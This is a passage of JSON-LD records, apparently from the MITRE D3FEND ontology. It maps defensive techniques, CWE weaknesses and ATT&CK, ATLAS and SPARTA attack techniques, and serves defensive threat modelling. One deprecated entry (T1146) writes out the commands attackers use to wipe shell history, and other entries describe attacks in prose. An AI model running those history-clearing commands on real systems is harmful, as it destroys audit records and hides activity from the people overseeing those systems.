      "@id": "d3f:Reference-VariableInitialization_CWE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://cwe.mitre.org/data/definitions/457.html"
      },
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:VariableInitialization"
      },
      "d3f:kb-reference-title": "CWE-457: Use of Uninitialized Variable",
      "rdfs:label": "Reference - Variable Initialization - CWE-457"
    },
    {
      "@id": "d3f:DomainTrustPolicy",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainTrustPolicy"
      ],
      "d3f:d3fend-id": "D3-DTP",
      "d3f:definition": "Restricting inter-domain trust by modifying domain configuration.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-HowTrustRelationshipsWorkForResourceForestsInAzureActiveDirectoryDomainServices"
      },
      "d3f:restricts": [
        {
          "@id": "d3f:DirectoryService"
        },
        {
          "@id": "d3f:T1087.002"
        }
      ],
      "rdfs:label": "Domain Trust Policy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessPolicyAdministration"
        },
        {
          "@id": "_:N9f50bcdfbe4e44f1a339f4b797f11e95"
        },
        {
          "@id": "_:Nf0f477a9aa4e495ab7ddf1da6221611e"
        }
      ]
    },
    {
      "@id": "_:N9f50bcdfbe4e44f1a339f4b797f11e95",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DirectoryService"
      }
    },
    {
      "@id": "_:Nf0f477a9aa4e495ab7ddf1da6221611e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:T1087.002"
      }
    },
    {
      "@id": "d3f:T1485",
      "@type": "owl:Class",
      "d3f:attack-id": "T1485",
      "d3f:definition": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.",
      "rdfs:label": "Data Destruction",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:HMIApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:OTControlFunction"
      },
      "d3f:definition": "Application software which runs the main program in an HMI.",
      "d3f:instructs": {
        "@id": "d3f:HMIApplicationProcess"
      },
      "rdfs:label": "HMI Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N9b367c4e5b5c4144a7bdbbd4e2ae855b"
        },
        {
          "@id": "_:Nb566134236334deea7d31b09bbab9271"
        }
      ]
    },
    {
      "@id": "_:N9b367c4e5b5c4144a7bdbbd4e2ae855b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlFunction"
      }
    },
    {
      "@id": "_:Nb566134236334deea7d31b09bbab9271",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HMIApplicationProcess"
      }
    },
    {
      "@id": "d3f:CCI-001373_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, examines the information for the presence of organization-defined unsanctioned information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001373"
    },
    {
      "@id": "d3f:VMImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:SystemStateImage"
      },
      "d3f:definition": "A Virtual Machine Image (VMI) is a file that encapsulates the entire state of a virtual machine at a given point in time. This includes the operating system, applications, data, and configurations. VMIs are used to create and replicate virtual machines, ensuring consistency and reliability across different environments.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.ituonline.com/tech-definitions/what-is-a-virtual-machine-image/"
      },
      "rdfs:label": "Virtual Machine Image",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Virtual_machine_image"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:StorageImage"
        },
        {
          "@id": "_:N754b144c118c46dc859cd7b43fad4626"
        }
      ],
      "skos:altLabel": "VM Image"
    },
    {
      "@id": "_:N754b144c118c46dc859cd7b43fad4626",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemStateImage"
      }
    },
    {
      "@id": "d3f:Reference-BiometricChallenge-ResponseAuthentication-Accenture",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.patentguru.com/US2021110015A1"
      },
      "d3f:kb-abstract": "Secret biometric responses to authentication challenges for MFA.\n\nMethods, systems, and apparatus, including computer programs encoded on computer storage media, for authenticating users based on a sequence of biometric authentication challenges. In one aspect, a process includes receiving a first image of the face of the user and processing the first image according to a first authentication process to determine whether the face of the user shown in the first image matches the face of an authorized user. A second authentication process including a sequence of biometric authentication challenges is identified. The sequence includes at least one facial expression challenge. The user is authenticated in response to determining that the first authentication process is satisfied based on the face of the user shown in the first image matching the face of the authorized user and the second authentication process is satisfied based on the user providing a valid biometric response to each biometric authentication challenge.",
      "d3f:kb-author": "Ben McCarty, Ellie Daw",
      "d3f:kb-mitre-analysis": "MITRE Analysis was not found.",
      "d3f:kb-organization": "Accenture",
      "d3f:kb-reference-of": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:kb-reference-title": "Biometric Challenge-Response Authentication",
      "rdfs:label": "Reference - Biometric Challenge-Response Authentication - Accenture"
    },
    {
      "@id": "d3f:T1527",
      "@type": "owl:Class",
      "d3f:attack-id": "T1527",
      "d3f:definition": "Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1550.001",
      "rdfs:label": "Application Access Token",
      "rdfs:seeAlso": {
        "@id": "d3f:T1550.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        }
      ]
    },
    {
      "@id": "d3f:SoftwarePatch",
      "@type": "owl:Class",
      "d3f:definition": "A patch is a piece of software designed to update a computer program or its supporting data, to fix or improve it. This includes fixing security vulnerabilities and other bugs, with such patches usually called bugfixes or bug fixes, and improving the usability or performance. Although meant to fix problems, poorly designed patches can sometimes introduce new problems (see software regressions). In some special cases updates may knowingly break the functionality, for instance, by removing components for which the update provider is no longer licensed or disabling a device.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Patch_(computing)"
      },
      "rdfs:label": "Software Patch",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      },
      "skos:altLabel": "Patch"
    },
    {
      "@id": "d3f:AML.T0076",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0076",
      "d3f:definition": "An adversary may purposefully corrupt a malicious AI model file so that it cannot be successfully deserialized in order to evade detection by a model scanner. The corrupt model may still successfully execute malicious code before deserialization fails.",
      "rdfs:label": "Corrupt AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0076"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Corrupt AI Model"
    },
    {
      "@id": "d3f:CWE-1233",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1233",
      "d3f:definition": "The product uses a register lock bit protection mechanism, but it does not ensure that the lock bit prevents modification of system registers or controls that perform changes to important hardware system configuration.",
      "rdfs:label": "Security-Sensitive Hardware Controls with Missing Lock Bit Protection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-284"
        },
        {
          "@id": "d3f:CWE-667"
        }
      ]
    },
    {
      "@id": "d3f:T1542.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1542.001",
      "d3f:definition": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)",
      "d3f:modifies": {
        "@id": "d3f:SystemFirmware"
      },
      "rdfs:label": "System Firmware",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1542"
        },
        {
          "@id": "_:Nb2405e59c49545929eea5a10973fcdb6"
        }
      ]
    },
    {
      "@id": "_:Nb2405e59c49545929eea5a10973fcdb6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirmware"
      }
    },
    {
      "@id": "d3f:ST0006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to avoid being detected.",
      "d3f:display-order": 6,
      "rdfs:label": "Defense Evasion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0006"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Defense Evasion"
    },
    {
      "@id": "d3f:addressed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x addressed-by y: Relates a resource x (e.g., network host, peripheral device, disk sector, a memory cell or other logical or physical entity) to a discrete address y in an address space that points to it.",
      "owl:inverseOf": {
        "@id": "d3f:addresses"
      },
      "rdfs:label": "addressed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:DS0003",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)",
      "d3f:exactly": {
        "@id": "d3f:ScheduledJob"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Scheduled Job Metadata component",
      "rdfs:label": "Scheduled Job (ATT&CK DS)"
    },
    {
      "@id": "d3f:OTEngineeringSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Software used in an industrial process to help engineers design, test, and maintain OT. This software enables the programming of OT controllers.",
      "d3f:produces": {
        "@id": "d3f:OTControlProgram"
      },
      "rdfs:label": "OT Engineering Software",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DeveloperApplication"
        },
        {
          "@id": "_:Nc8cfa00b38bd4f39937b8659b7960b79"
        }
      ]
    },
    {
      "@id": "_:Nc8cfa00b38bd4f39937b8659b7960b79",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:EventLogClearEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the event log data is cleared from the system, often as part of log maintenance or potentially to cover tracks.",
      "rdfs:label": "Event Log Clear Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:CWE-311",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-311",
      "d3f:definition": "The product does not encrypt sensitive or critical information before storage or transmission.",
      "rdfs:label": "Missing Encryption of Sensitive Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:TerminateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "On many computer operating systems, a computer process terminates its execution by making an exit system call. More generally, an exit in a multithreading environment means that a thread of execution has stopped running. For resource management, the operating system reclaims resources (memory, files, etc.) that were used by the process. The process is said to be a dead process after it terminates.",
      "d3f:terminates": {
        "@id": "d3f:Process"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Exit_(system_call)"
      },
      "rdfs:label": "Terminate Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nbcab1ffc2de349ea9ca2c36896a677a0"
        }
      ]
    },
    {
      "@id": "_:Nbcab1ffc2de349ea9ca2c36896a677a0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:terminates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:T1146",
      "@type": "owl:Class",
      "d3f:attack-id": "T1146",
      "d3f:definition": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1070.003",
      "rdfs:label": "Clear Command History",
      "rdfs:seeAlso": {
        "@id": "d3f:T1070.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:EX-0012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0012",
      "d3f:definition": "The attacker alters live or persistent data that the spacecraft uses to make decisions and route work. Targets include device and control registers, parameter and limit tables, internal routing/subscriber maps, schedules and timelines, priority/QoS settings, watchdog and timer values, autonomy/FDIR rule tables, ephemeris and attitude references, and power/thermal setpoints. Many missions expose legitimate mechanisms for updating these artifacts, direct memory read/write commands, table load services, file transfers, or maintenance procedures, which can be invoked to steer behavior without changing code. Edits may be transient (until reset) or latched/persistent across boots; they can be narrowly scoped (a single bit flip on an enable mask) or systemic (rewriting a routing table so commands are misdelivered). The effect space spans subtle biasing of control loops, selective blackholing of commands or telemetry, rescheduling of operations, and wholesale changes to mode logic, all accomplished by modifying the values the software already trusts and consumes.",
      "d3f:modifies": {
        "@id": "d3f:RuntimeVariable"
      },
      "rdfs:label": "Modify On-Board Values - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:N00bd4549d0554220954a8ca2dc9e0849"
        }
      ],
      "skos:prefLabel": "Modify On-Board Values"
    },
    {
      "@id": "_:N00bd4549d0554220954a8ca2dc9e0849",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a new registry key is added to the Windows Registry, establishing a new hierarchical node for configuration.",
      "rdfs:label": "Windows Registry Key Creation Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:N26b26df215fa4311b4230a03368ceb7f"
        }
      ]
    },
    {
      "@id": "_:N26b26df215fa4311b4230a03368ceb7f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyImportEvent"
      }
    },
    {
      "@id": "d3f:initiates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x initiates y: The entity or action x starts or triggers entity or function y, bringing it into action.",
      "rdfs:label": "initiates",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1049",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1049",
      "d3f:definition": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.",
      "d3f:may-invoke": {
        "@id": "d3f:GetOpenSockets"
      },
      "rdfs:label": "System Network Connections Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N07c61a7993c74e9d86abc62f5a968e1f"
        }
      ]
    },
    {
      "@id": "_:N07c61a7993c74e9d86abc62f5a968e1f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetOpenSockets"
      }
    },
    {
      "@id": "d3f:T1036.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036.010",
      "d3f:definition": "Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)",
      "rdfs:label": "Masquerade Account Name",
      "rdfs:subClassOf": {
        "@id": "d3f:T1036"
      }
    },
    {
      "@id": "d3f:LinuxOpenAtArgumentO_CREAT",
      "@type": "owl:Class",
      "d3f:definition": "Create a regular file. Same functionality as Linux Open but slight differences in parameter.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/openat.2.html"
      },
      "rdfs:label": "Linux OpenAt Argument O_CREAT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:CWE-31",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-31",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize 'dir\\..\\..\\filename' (multiple internal backslash dot dot) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: 'dir\\..\\..\\filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:ATTACKICSPrivilegeEscalationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0111"
      },
      "rdfs:label": "Privilege Escalation Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N5b3d9b8ce6a04ef1a2647fbd85bacf2f"
        }
      ],
      "skos:prefLabel": "Privilege Escalation Technique"
    },
    {
      "@id": "_:N5b3d9b8ce6a04ef1a2647fbd85bacf2f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0111"
      }
    },
    {
      "@id": "d3f:ResumeProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:resumes": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Resume Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N3c4d108b575348859ad7046c144d0b5d"
        }
      ]
    },
    {
      "@id": "_:N3c4d108b575348859ad7046c144d0b5d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:resumes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:RegOpenKeyExW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyExW"
    },
    {
      "@id": "d3f:StackFrameCanary",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Stack canaries, named for their analogy to a canary in a coal mine, are used to detect a stack buffer overflow before execution of malicious code can occur. This method works by placing a small integer, the value of which is randomly chosen at program start, in memory just before the stack return pointer. Most buffer overflows overwrite memory from lower to higher memory addresses, so in order to overwrite the return pointer (and thus take control of the process) the canary value must also be overwritten. This value is checked to make sure it has not changed before a routine uses the return pointer on the stack. This technique can greatly increase the difficulty of exploiting a stack buffer overflow because it forces the attacker to gain control of the instruction pointer by some non-traditional means such as corrupting other important variables on the stack.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Stack_buffer_overflow#Stack_canaries"
      },
      "rdfs:label": "Stack Frame Canary",
      "rdfs:subClassOf": {
        "@id": "d3f:StackComponent"
      },
      "skos:altLabel": "Stack Canary"
    },
    {
      "@id": "d3f:DE-0009.03",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009.03",
      "d3f:definition": "Decoys and deceptive signatures are used to provoke defenders into committing limited resources early, inspection vehicles, interceptors, laser dwell time, maneuver fuel, or analyst attention. The attacker deploys objects or emissions that mimic credible threats (trajectories, RCS/brightness, modulation) so tracking and discrimination systems prioritize the decoy. While defenses engage, the true operation proceeds with reduced scrutiny, or follows shortly after when defensive capacity and timelines are depleted. The effect is resource exhaustion and timeline compression on the defender’s side, increasing the success window for the actual action.",
      "rdfs:label": "Trigger Premature Intercept - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0009"
      },
      "skos:prefLabel": "Trigger Premature Intercept"
    },
    {
      "@id": "d3f:T1115",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1115",
      "d3f:definition": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.",
      "d3f:reads": {
        "@id": "d3f:Clipboard"
      },
      "rdfs:label": "Clipboard Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N0b5058d8ee1643ebb51cef9307e9ef8b"
        }
      ]
    },
    {
      "@id": "_:N0b5058d8ee1643ebb51cef9307e9ef8b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Clipboard"
      }
    },
    {
      "@id": "d3f:JobSchedulerSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:ScheduledJob"
      },
      "d3f:definition": "A job scheduler software is operating system software that when run executes scheduled tasks (time-scheduling in the sense of wall clock time; not operating system scheduling of processes for multitasking). Processes running such software are task scheduler processes. In Windows, Scheduled Tasks are created and managed by the Task Scheduler. In Unix-like OSes, the `cron` utitility serves a similar role.",
      "d3f:modifies": [
        {
          "@id": "d3f:JobSchedule"
        },
        {
          "@id": "d3f:ScheduledJob"
        }
      ],
      "d3f:synonym": "Task Scheduler Software",
      "rdfs:label": "Job Scheduler Software",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ScheduledJob"
        },
        {
          "@id": "dbr:Cron"
        },
        {
          "@id": "dbr:Windows_Task_Scheduler"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemServiceSoftware"
        },
        {
          "@id": "_:Ne2ee5564cbf54ef78044f58f67641ef4"
        },
        {
          "@id": "_:N61d076592b274c7ab7d015a9bd2eeb8a"
        },
        {
          "@id": "_:N5ee1e03d80e744b58c886530ba2b5a4f"
        }
      ]
    },
    {
      "@id": "_:Ne2ee5564cbf54ef78044f58f67641ef4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "_:N61d076592b274c7ab7d015a9bd2eeb8a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedule"
      }
    },
    {
      "@id": "_:N5ee1e03d80e744b58c886530ba2b5a4f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "d3f:CWE-241",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-241",
      "d3f:definition": "The product does not handle or incorrectly handles when a particular element is not the expected type, e.g. it expects a digit (0-9) but is provided with a letter (A-Z).",
      "rdfs:label": "Improper Handling of Unexpected Data Type",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-228"
      }
    },
    {
      "@id": "d3f:CWE-236",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-236",
      "d3f:definition": "The product does not handle or incorrectly handles when a particular parameter, field, or argument name is not defined or supported by the product.",
      "rdfs:label": "Improper Handling of Undefined Parameters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-233"
      }
    },
    {
      "@id": "d3f:OTRemoteModeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Command that places the controller in a mode capable of receiving read/write communication from a networked entity.",
      "rdfs:label": "OT Remote Mode Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:Nc8c0c5fd597943c58387561e1d3a4193"
        },
        {
          "@id": "_:Nc2763cadc42b43d8bcdfef5e07b899ca"
        },
        {
          "@id": "_:N01833faf6be3479fbc800b20fb17b22e"
        }
      ]
    },
    {
      "@id": "_:Nc8c0c5fd597943c58387561e1d3a4193",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "_:Nc2763cadc42b43d8bcdfef5e07b899ca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N01833faf6be3479fbc800b20fb17b22e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTRemoteModeCommand"
      }
    },
    {
      "@id": "rdfs:seeAlso",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:CWE-1248",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1248",
      "d3f:definition": "The security-sensitive hardware module contains semiconductor defects.",
      "rdfs:label": "Semiconductor Defects in Hardware Logic with Security-Sensitive Implications",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CWE-646",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-646",
      "d3f:definition": "The product allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion.",
      "rdfs:label": "Reliance on File Name or Extension of Externally-Supplied File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:Reference-AllLoginsSinceLastBoot_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2015-07-001/"
      },
      "d3f:kb-abstract": "Once a credential dumper like mimikatz runs, every user logged on since boot is potentially compromised, because the credentials were accessed via the memory of lsass.exe. When such an event occurs, this analytic will give the forensic context to identify compromised users. Those users could potentially be used in later events for additional logons.\n\nThe time field indicates the first and last time a system reported a user logged into a given system. This means that activity could be intermittent between the times given and should not be considered a duration.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:CredentialCompromiseScopeAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2015-07-001: All Logins Since Last Boot",
      "rdfs:label": "Reference - CAR-2015-07-001: All Logins Since Last Boot - MITRE"
    },
    {
      "@id": "d3f:T1406",
      "@type": "owl:Class",
      "d3f:attack-id": "T1406",
      "d3f:definition": "Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.",
      "rdfs:label": "Obfuscated Files or Information - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Obfuscated Files or Information"
